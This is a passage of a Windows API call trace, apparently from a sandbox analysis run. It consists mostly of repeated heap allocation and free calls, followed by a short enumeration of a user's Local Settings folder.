dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0189.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0189.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0189.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0189.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0189.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.781] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Local Settings\\") returned="Local Settings\\" [0189.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0189.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.781] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0189.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0189.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.781] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0189.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.782] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0189.782] PathFindFileNameW (pszPath="") returned="" [0189.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.782] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Local Settings\\*" (normalized: "c:\\users\\keecfmwgj\\local settings\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b06e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0189.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0189.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0189.783] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0189.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c60 [0189.783] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0189.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) 